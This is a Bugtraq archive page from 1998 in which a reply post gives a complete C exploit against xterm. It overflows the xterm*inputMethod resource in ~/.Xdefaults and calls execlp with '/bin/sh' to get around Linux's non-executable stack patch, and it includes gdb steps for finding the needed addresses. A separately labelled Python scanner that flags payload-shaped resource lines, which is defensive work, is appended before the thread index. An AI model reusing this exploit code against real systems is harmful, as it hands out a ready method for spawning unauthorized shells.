Bugtraq mailing list archives
Re: dip-3.3.7p exploit (stackpatch_
From: woloszyn () NOSPAM IT PL (M.C.Mar)
Date: Sun, 28 Jun 1998 14:04:19 +0200
On Fri, 26 Jun 1998, Thomas Troeger wrote:
Hi, While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes:
(...)

So.. I also developed some time ago an xploit that works around the non-executable stack patch (Linux), but for the xterm and Xaw vulnerability. It seems that defeating Solar's stackpatch is easier than we thought if the program contains any exec* PLT entry. If it contains exec*p we may use any string to execute ./_anystring_ if we have . in the PATH variable. So here goes my 'sploit:

$ cat 3xterm.c
/*
 * A simple xploit working around non-executable stack patch! ;)
 *
 * Based on Solar Designer's "Getting around non-executable stack (fix)" post
 * and Rafał Wojtczuk's "Defeating Solar Designer'a Non-executable Stack Patch"
 * sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets,
 * based on xterm_exp.c by alcuin.
 *
 * Compile it like this:
 *   gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc
 *
 * Description:
 * The sploit simply puts the EXECLP address and its parameters' addresses
 * onto the stack. To work fine you need to look for the execlp Program
 * Linkage Table entry in xterm and for the "/bin/sh" string in its text
 * segment...
 *
 * emsi:~mcmar/hack# gdb xterm
 * GDB is free software and you are welcome to distribute copies of it
 *  under certain conditions; type "show copying" to see the conditions.
 * There is absolutely no warranty for GDB; type "show warranty" for details.
 * GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc...
 * (no debugging symbols found)...
 * (gdb) print execlp
 * $1 = {<text variable, no debug info>} 0x804bc78 <execlp>
 * (gdb) x/s 0x8063d2e
 * 0x8063d2e <_fini+8158>:  "/bin/sh"
 *
 * 0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the
 * right ones in your case... ;)
 *
 * GreetZ: bulba, smierc, all of Lam3rZ team and other Polish HackerZ ;)
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>

#define CONFFILE ".Xdefaults"
#define OLDFILE  ".Xdefaults.old"
#define NEWFILE  ".Xdefaults.new"
#define EXECLP   0x804bc78   /* execlp PLT address in xterm */
#define BIN_SH   0x8063d2e   /* "/bin/sh" string address in xterm ;) */

int *ptr;

int main(int argc, char *argv[])
{
    char *home;
    FILE *f_in, *f_out;
    char buff[16384];
    char shellbuf[16384];
    char *s;

    /* work in the user's home directory, where .Xdefaults lives */
    if ((home = getenv("HOME")))
        chdir(home);

    if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
    }

    /* copy the existing .Xdefaults, dropping any old xterm*inputMethod line */
    if ((f_in = fopen(CONFFILE, "r"))) {
        while (fgets(buff, sizeof(buff), f_in)) {
            for (s = buff; isblank((unsigned char)*s); s++)
                ;
            if (strncmp(s, "xterm*inputMethod", 17) != 0)
                fputs(buff, f_out);
        }
        fclose(f_in);
    }

    /* fill the buffer with nops */
    memset(shellbuf, 0x90, sizeof(shellbuf));
    shellbuf[sizeof(shellbuf) - 1] = 0;

    /* put the EXECLP address, a return address for it, and its
       parameters' addresses ("/bin/sh", "/bin/sh", NULL) onto the stack */
    ptr = (int *)(shellbuf + 1028);
    *ptr++ = EXECLP;
    *ptr++ = EXECLP;
    *ptr++ = BIN_SH;
    *ptr++ = BIN_SH;
    *ptr++ = 0;           /* NULL argument; also terminates the string */

    fputs("xterm*inputMethod:", f_out);
    fputs(shellbuf, f_out);
    fclose(f_out);

    system("/bin/cp " CONFFILE " " OLDFILE);
    system("/bin/mv -f " NEWFILE " " CONFFILE);
    execl("/usr/X11R6/bin/xterm", "xterm", NULL);
    return 0;
}

It contains some useless stuff, but it's 'coz I just used a normal xterm sploit as a base.

RegardZ,

--
___________________________________________________________________________
M.C.Mar          An NT server can be run by an idiot, and usually is.
emsi () it pl    "If you can't make it good, make it LOOK good." - Bill Gates
Maybe this isn't the place, but, for example, M$ programs are, in their own way, monuments to stupidity.
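The post's payload is delivered through a resource value in ~/.Xdefaults: a long run of identical filler bytes followed by raw 4-byte addresses, which no legitimate xterm*inputMethod value ever contains. The following heuristic scanner is an added example written for this archive page, not code from the post or from any project it mentions. It flags resource lines with oversized values, non-printable bytes, or long runs of one repeated byte; the thresholds (MAX_VALUE_LEN, MAX_REPEAT_RUN) are assumptions chosen for the example, and the sample file it scans is constructed inline, reusing only the two addresses quoted in the post as sample data.

```python
"""Heuristic scanner for X resource files (.Xdefaults / .Xresources).

Added example for this page: flags resource values shaped like the payload
described in the post (filler run plus binary data), so that a host check
or a forensic review of a user's dotfiles can spot tampered entries.
"""
import re
import struct

# Thresholds are assumptions for this example; tune them per environment.
MAX_VALUE_LEN = 512      # no sane X resource value is this long
MAX_REPEAT_RUN = 32      # a run of one identical byte this long suggests filler

# name : value, where the name may not start with a comment marker
_RESOURCE_RE = re.compile(rb'^\s*([^:!#\s][^:]*?)\s*:\s*(.*)$', re.S)


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte in data."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def scan_xresources(content: bytes):
    """Return a list of (line_no, resource_name, reasons) for suspicious lines."""
    findings = []
    for line_no, raw in enumerate(content.split(b'\n'), 1):
        line = raw.rstrip(b'\r')
        if not line.strip() or line.lstrip().startswith((b'!', b'#')):
            continue  # blank line or comment
        m = _RESOURCE_RE.match(line)
        if not m:
            continue  # not a resource assignment
        name, value = m.group(1), m.group(2)
        reasons = []
        if len(value) > MAX_VALUE_LEN:
            reasons.append('oversized value (%d bytes)' % len(value))
        if any((b < 0x20 and b != 0x09) or b >= 0x7f for b in value):
            reasons.append('non-printable bytes in value')
        run = longest_run(value)
        if run >= MAX_REPEAT_RUN:
            reasons.append('filler run of %d identical bytes' % run)
        if reasons:
            findings.append((line_no, name.decode('latin-1'), reasons))
    return findings


def build_constructed_sample() -> bytes:
    """Constructed test input: a benign .Xdefaults plus one resource line
    carrying 0x90 filler and little-endian addresses, mirroring the shape
    of the payload in the post. The two address values are the ones quoted
    there and serve only as sample data here."""
    benign = (b'! constructed sample .Xdefaults\n'
              b'xterm*scrollBar: true\n'
              b'XTerm*faceName: Monospace\n')
    payload = b'\x90' * 1028 + struct.pack('<IIII', 0x804bc78, 0x804bc78,
                                            0x8063d2e, 0x8063d2e)
    return benign + b'xterm*inputMethod:' + payload


if __name__ == '__main__':
    for line_no, name, reasons in scan_xresources(build_constructed_sample()):
        print('line %d %s: %s' % (line_no, name, '; '.join(reasons)))
```

Run against a real file with scan_xresources(open(path, 'rb').read()); reading as bytes matters, because a text-mode read would choke on or silently remap the very bytes the check is looking for.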
Current thread:
- Re: Bug is sudo?, (continued)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)
- Re: security hole in mailx Theo de Raadt (Jun 25)
- guestbook script is still vulnerable under apache Stunt Pope (Jun 25)
- Re: guestbook script is still vulnerable under apache Theo Van Dinter (Jun 25)
- Re: guestbook script is still vulnerable under apache Andru Luvisi (Jun 25)
- Re: guestbook script is still vulnerable under apache Lincoln Stein (Jun 26)
- dip-3.3.7p exploit (stackpatch_ Thomas Troeger (Jun 26)
- And another qpopper overflow (does this make 3?) Aaron D. Gifford (Jun 28)
- Re: dip-3.3.7p exploit (stackpatch_ M.C.Mar (Jun 28)
- WIPO Bill Aleph One (Jun 25)
- Re: guestbook script is still vulnerable under apache Dean Gaudet (Jun 25)
- Re: guestbook script is still vulnerable under apache Lars Eilebrecht (Jun 25)
- Re: guestbook script is still vulnerable under apache Andrew Clegg (Jun 26)
- Re: security hole in mailx Seth McGann (Jun 25)